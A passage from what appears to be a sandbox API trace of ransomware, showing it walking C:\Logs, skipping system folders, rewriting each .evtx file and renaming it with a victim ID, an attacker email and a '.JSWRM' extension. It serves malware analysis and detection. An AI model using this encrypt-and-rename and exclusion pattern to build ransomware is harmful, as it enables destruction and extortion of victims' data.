lpWideCharStr=0x0) returned 8 [0065.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0065.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0065.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0065.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0065.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f158 [0065.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.994] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0065.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0065.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0065.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0065.995] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd125335f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd125335f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cAlternateFileName="MI7A67~1.EVT")) returned 1 [0065.995] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2=".") returned 1 [0065.995] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="..") returned 1 [0065.995] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="...") returned 1 [0065.995] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="windows") returned -1 [0065.995] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="recovery") returned -1 [0065.995] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="perflogs") returned -1 [0065.995] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.995] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.995] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="system volume information") returned -1 [0065.995] lstrcmpiW (lpString1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpString2="msocache") returned -1 [0065.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0065.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0065.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cchWideChar=64, lpMultiByteStr=0x22c380, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpUsedDefaultChar=0x0) returned 64 [0065.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0065.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0065.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cchWideChar=64, lpMultiByteStr=0x22c6f0, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpUsedDefaultChar=0x0) returned 64 [0065.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0065.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0065.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0065.996] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.996] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.996] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.996] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.001] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.002] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0066.002] CloseHandle (hObject=0x450) returned 1 [0066.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0066.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0066.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0066.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0066.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0066.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0066.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.004] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0066.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0066.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0066.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0066.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0066.005] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-SettingSync%4Debug.evtx", cAlternateFileName="MI3773~1.EVT")) returned 1 [0066.005] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2=".") returned 1 [0066.005] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="..") returned 1 [0066.005] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="...") returned 1 [0066.005] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="windows") returned -1 [0066.005] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="recovery") returned -1 [0066.005] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="perflogs") returned -1 [0066.005] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="documents and settings") returned 1 [0066.005] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.005] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="system volume information") returned -1 [0066.005] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Debug.evtx", lpString2="msocache") returned -1 [0066.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0066.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SettingSync%4Debug.evtx", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0066.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SettingSync%4Debug.evtx", cchWideChar=41, lpMultiByteStr=0x1f84e8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SettingSync%4Debug.evtx", lpUsedDefaultChar=0x0) returned 41 [0066.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0066.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0066.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SettingSync%4Debug.evtx", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0066.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SettingSync%4Debug.evtx", cchWideChar=41, lpMultiByteStr=0x1f8328, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SettingSync%4Debug.evtx", lpUsedDefaultChar=0x0) returned 41 [0066.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0066.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0066.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0066.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0066.006] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.007] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=1052672) returned 1 [0066.007] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2481b0 [0066.007] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0066.019] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.019] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0066.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0066.020] CloseHandle (hObject=0x450) returned 1 [0066.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0066.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0066.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0066.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0066.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0066.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2175c0 [0066.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0066.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0066.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2175c0 | out: hHeap=0x1e0000) returned 1 [0066.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0066.062] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0066.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0066.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0066.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.063] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-SettingSync%4Operational.evtx", cAlternateFileName="MI36AA~1.EVT")) returned 1 [0066.063] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2=".") returned 1 [0066.063] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="..") returned 1 [0066.063] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="...") returned 1 [0066.063] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="windows") returned -1 [0066.063] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="recovery") returned -1 [0066.063] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="perflogs") returned -1 [0066.063] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="documents and settings") returned 1 [0066.063] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.063] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="system volume information") returned -1 [0066.063] lstrcmpiW (lpString1="Microsoft-Windows-SettingSync%4Operational.evtx", lpString2="msocache") returned -1 [0066.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0066.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SettingSync%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0066.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SettingSync%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x1f8328, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SettingSync%4Operational.evtx", lpUsedDefaultChar=0x0) returned 47 [0066.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0066.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0066.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SettingSync%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0066.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SettingSync%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x1f87c0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SettingSync%4Operational.evtx", lpUsedDefaultChar=0x0) returned 47 [0066.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0066.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0066.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0066.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0066.064] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.064] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.064] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0066.064] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.070] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.070] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 